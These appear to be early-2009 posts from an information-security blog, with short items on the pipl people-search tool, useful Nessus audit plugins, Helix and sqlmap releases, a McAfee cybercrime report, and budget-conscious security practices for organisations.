Friday, February 27, 2009

People Search

Recently discovered a new tool called pipl to find people online. It is amazingly accurate and accumulates information from a variety of sources including facbeook, myspace, amazon etc. If you are into security assessment / penetration testing, it is a very good data gathering tool.

Monday, February 16, 2009

Lesser known Nessus plugins

We all know that Nessus is a powerful vulnerability scan and audit tool, it currently has more than 25,000 plugins to scan various operating systems and applications but what are some of the lesser known but powerful plugins? Here I list five of those plugins, which are extremely useful in a corporate environment.

  1. Nikto plugin. Using this plugin you can automate the application assessment in the organization and the greatest strength is that you can incorporate the results into Nessus and you can present the report along with other vulnerability findings.
  2. Installed software discovery. One of the challenges we face everyday involve identifying and preventing unauthorized software on the desktops and servers. Nessus offers multiple plugins to identify and create an inventory of installed software.
  3. Wireless SSID discovery. In your organization do you know how many active wireless networks are there? Even more intriguing is do we know how many of your desktops are associated with a wireless network? This particular Nessus plugin can identify active wireless domains for each desktops or laptops in your organization. This is invaluable for not only identifying which devices are susceptible to wireless threats but also ensures compliance with your internal policies and standards like PCI
  4. Auditing disabled USB drives. Many organizations have policies that prevent the use of USB drives but how do we ensure that all desktops and servers are in compliance with this policy? Nessus offers an .audit file to scan the devices to verify that the system indeed has locked the USB drives.
  5. Scanning for administrator access. Nessus offers various plugins to identify administrator privileges, some of the important ones are,
SMB blank admin password, It enables you to find servers with blank administrator
Users in "domain administrator" and local administrator group. This enables
           you to find the users who are part of this important administrator group.

For more information visit the Nessus plugin page

Monday, February 9, 2009

Helix goes commercial

Just learned from the SANS GCFA mailing list that Helix, one of the most popular and powerful forensic and incident response live CD has gone commercial.

Friday, February 6, 2009

SQL Injection tool

A new version of sqlmap is out, it is an automatic SQL injection scanning and exploitation tool. Once it identifies the injection vulnerability it will enumerate database tables, usernames, passwords etc
I was always fascinated by the economics of Information Security, what prompts people to write and propagate malwares. Almost all of today's malware is financially motivated and they find new ways and methods in this difficult economic conditions. 

McAfee recently released its Virtual Criminology Report, their annual study of global cybercrime includes this and other findings. Monitoring and awareness are key in protecting the information assets of an organization.

Monday, February 2, 2009

Information Security in a down economy

Many organizations are reducing the overall budget and new projects are either getting postponed or suspended. So what can we as corporate information security professionals do to enhance or maintain security levels, some points to consider are,

  • Renegotiate support contracts to get better pricing.
  • Find open source alternatives. Ex: replace the host monitoring agents with OSSEC host agents, install Snort on an old and unused server, replace commercial VA scan tools with open source alternatives etc.
  • Tune the existing tools to get maximum benefit.
  • Inventory the infrastructure and perform risk assessment to find out if you are paying attention to the right network, systems, applications and data.
  • Prove the value of information security to the organization to get what ever funding you can get.
  • Demonstrate that the previous investments are paying off.
  • Get involved in the business activities and propose information security solutions as part of the business projects.
  • Attend various web casts, listen to many podcasts as an alternative to paid training while still learning in the field of information security.